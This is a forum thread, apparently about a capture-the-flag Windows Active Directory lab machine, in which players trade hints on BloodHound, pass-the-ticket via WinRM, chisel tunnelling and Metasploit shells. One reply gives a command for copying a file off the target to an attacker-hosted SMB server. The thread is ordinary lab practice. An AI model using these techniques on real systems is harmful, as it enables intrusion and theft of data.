I’m stuck with bloodhound and l.*. It seems that i don’t have rights over anyone or anything. Any nudges?
Anyone who managed to perform a passtheticket via win-rm?
Getting a strange gsm error.
Did you configure /etc/krb5.conf properly?
1 Like
Anyone having problems with Ou**** Me******* Ser*** ? Cant seem to log-in using the .deb client. Most of the time it will just timeout. Or am I supposed to spray the credential or something?
I can’t read anything! Back to what this silly user can do 
I enumerated, but can get to what I need. Perhaps I missed something?
2 Likes
Sweet Jeebuz…
I have an sql.zip file on the target Windows machine using the Evil-winRM powershell terminal.
“sql.zip”
I’ve tried and failed more ways to transfer this file to my linux machine than I care to count
Any gurus know the way for this?
Nevermind: I unzipped it on the machine and then transfered. Gratzi.
Hello, for the next time, you can use impacket-smbServer to create a local smb server in your linux machine and in the windows machine use the copy command
copy sql.zip \your.linux.ip\folderName\sql.zip
2 Likes
SPOILER ALERT: Click only if you realllllly wanna!
I found the root creds however when I try to send chisel to the target machine, and try to run it, I get the following:
Tried: Shutting off Windows Defender
Renaming the chisel apps and running
UFW rule changes to accept IP from INFIL
Eating sugar and downing a beer…kinda worked.
Restarting machine (x5) same results each time.
I’ve tried a number of different failing Chisel clients:
defender shouldnt be getting in the way.
Is that error from a fresh new machine?
If youve already tried to forward that port before then it will be bound to another process. Are you on a shared machine? Maybe someones got it hosed up.
Have you tried getting a MSFconsole shell rather than the Win-RM one? They are more stable and its easier to kill your processes via the console.
1 Like
I’ve used MSF to get a new shell but, same results, really. Not sure what’s happening.
I’ve tried a few more things to get Windows to forward the port but most fizzle out.
I’ve tried almost every chisel.exe offered on Github. lol
Loorrrrrrrt! 
Chisel should work no probs. At that point id almost recommend resetting. You could try to kill any processes youve ran. Unless its been patched in some way but i dont think theyd patch it that way.
I have a script to get back to user very quickly if you need it
1 Like
I figured it out with some help from the Froggie!
It was determined that when using WinRM to execute any commands, I was hanging up the system by doing so…specifically running chisel!
So, once access was established, immediately start a new shell on MSF and then continue from there. WOOOOOOOOOOOO!!!
Hope this helps some of you!
1 Like
How can I get a blockchain bridge bug?
Does someone here already try the intended way I mean not using the MySQL for flag ?
Yes. you need a windows machine 100% for intended way.
Hey all,
I got the user, got in the Output messenger accounts and found the executable. I debugged it but it seems i’m not able to retrieve the password for the account I want to aka w******
Do you have any hint regarding the intended way, is this a rabbit hole ? Thank you 
Got a shell as o.m....... thanks to emsec’s help. still working my way to administrator.
update still stuck. definitely might just wait for ippsec’s video to drop for this.
Busy with root:
Found some Backup credentials, but none of them seem to work. What am I doing wrong?
Note that in the previous part there was some collision and I needed the option --keep-guessing.
I have some progress, but installing ntdissector broke my system…
1 Like